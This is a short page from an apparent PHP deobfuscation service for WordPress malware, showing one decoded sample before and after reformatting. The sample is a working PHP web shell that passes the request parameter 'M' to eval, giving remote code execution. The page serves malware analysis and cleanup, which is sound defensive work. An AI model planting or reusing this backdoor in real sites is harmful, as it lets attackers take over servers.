Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['M']);?>7...



Obfuscated php code

<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['M']);?>7

Decoded(de-Obfuscated) php code

<?php

class GaM10fA5
{
    public function __construct($H7mu6)
    {
        @eval("/*ZG5zknRfSk*/" . $H7mu6 . "");
    }
}
new GaM10fA5($_REQUEST['M']);
?>7


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.